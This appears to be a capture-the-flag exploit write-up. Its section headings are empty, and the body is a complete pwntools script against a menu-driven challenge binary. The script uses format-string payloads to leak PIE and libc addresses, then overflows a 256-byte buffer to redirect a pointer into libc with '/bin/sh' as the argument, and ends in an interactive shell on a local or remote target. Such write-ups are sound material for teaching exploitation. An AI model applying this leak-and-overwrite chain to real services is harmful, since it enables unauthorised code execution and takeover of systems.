Purpose : Get The Flag
Mitigations :
Crash :
Decompile :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
#!/usr/bin/python3
from pwn import *
import struct
# context.terminal = ['tmux','splitw','-h']
os.environ['XDG_CACHE_HOME'] = '/tmp/'
context.log_level = 'error'
info = lambda msg: log.info(msg)
sla = lambda msg, data: io.sendlineafter(msg, data)
sa = lambda msg, data: io.sendafter(msg, data)
sl = lambda data: io.sendline(data)
s = lambda data: io.send(data)
# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw)
# Specify GDB script here (breakpoints etc)
gdbscript = '''
break *main+247
continue
continue
continue
continue
'''.format(**locals())
exe = './bin'; elf = context.binary = ELF(exe);exe_rop = ROP(elf,checksec=False)
libc = elf.libc ; libc_rop = ROP(libc)
io = start()
payload =b""
payload +=b"%13$p"
payload +=b"A"*(256-len(payload))
io.sendlineafter(b"Choice: ",b"3")
io.sendlineafter(b"nter new content length:",b"512")
io.sendlineafter(b"Enter new content:",payload)
io.sendafter(b"Choice: ",b"2")
leak=u64(io.recvuntil(b"1.").split(b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")[1].split(b"\n")[0]+b"\x00"*2)
print(f"pie Leak :: {hex(leak)}")
elf.address = leak - 5073
print(f"pie base :: {hex(elf.address)}")
payload =b""
payload +=b"%3$p" ## speciall thanks to Hassan aka @72goul for turning this into format string to get libc leak from stack
payload +=b"A"*(256-len(payload))
payload +=p64(elf.address+0x1100)
#payload = b"aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaac"
io.sendlineafter(b"Choice: ",b"3")
io.sendlineafter(b"nter new content length:",b"512")
io.sendlineafter(b"Enter new content:",payload)
io.sendafter(b"Choice: ",b"0")
io.recvuntil(b"Invalid!\n")
leak_libc = int(io.recvline().split(b"AAAAAA")[0],16)
print(f"Libc leak :: {hex(leak_libc)}")
libc = elf.libc ; libc_rop = ROP(libc)
libc.address = leak_libc -1132679
print(f"Libc address :: {hex(libc.address)}")
payload =b""
payload +=b"/bin/sh\x00"
payload +=b"A"*(256-len(payload))
payload +=p64(libc.address+330323)
#payload = b"aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaac"
io.sendlineafter(b"Choice: ",b"3")
io.sendlineafter(b"nter new content length:",b"512")
io.sendlineafter(b"Enter new content:",payload)
io.sendafter(b"Choice: ",b"0")
io.recvuntil(b"Invalid!\n")
io.interactive()